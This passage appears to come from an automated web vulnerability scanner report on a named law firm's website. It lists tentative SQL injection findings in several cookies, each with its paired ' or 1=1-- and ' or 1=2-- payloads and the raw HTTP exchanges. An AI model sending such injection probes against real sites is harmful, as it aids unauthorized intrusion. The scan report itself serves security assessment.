Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953792255674%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 16:11:35 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953792255674%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.80. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 92347001%20or%201%3d1--%20 and 92347001%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898892347001%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 16:11:41 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898892347001%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.81. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 21326148'%20or%201%3d1--%20 and 21326148'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=21326148'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 16:12:00 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=21326148'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.82. http://www.pillsburylaw.com/scripts/images/arrows-default.png [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 15468633'%20or%201%3d1--%20 and 15468633'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=15468633'%20or%201%3d1--%20; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 16:12:06 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=15468633'%20or%201%3d2--%20; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:12:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.83. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 69977606'%20or%201%3d1--%20 and 69977606'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=69977606'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:11:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 16:11:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=69977606'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyw
...[SNIP]...
1.84. http://www.pillsburylaw.com/scripts/images/arrows-default.png [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

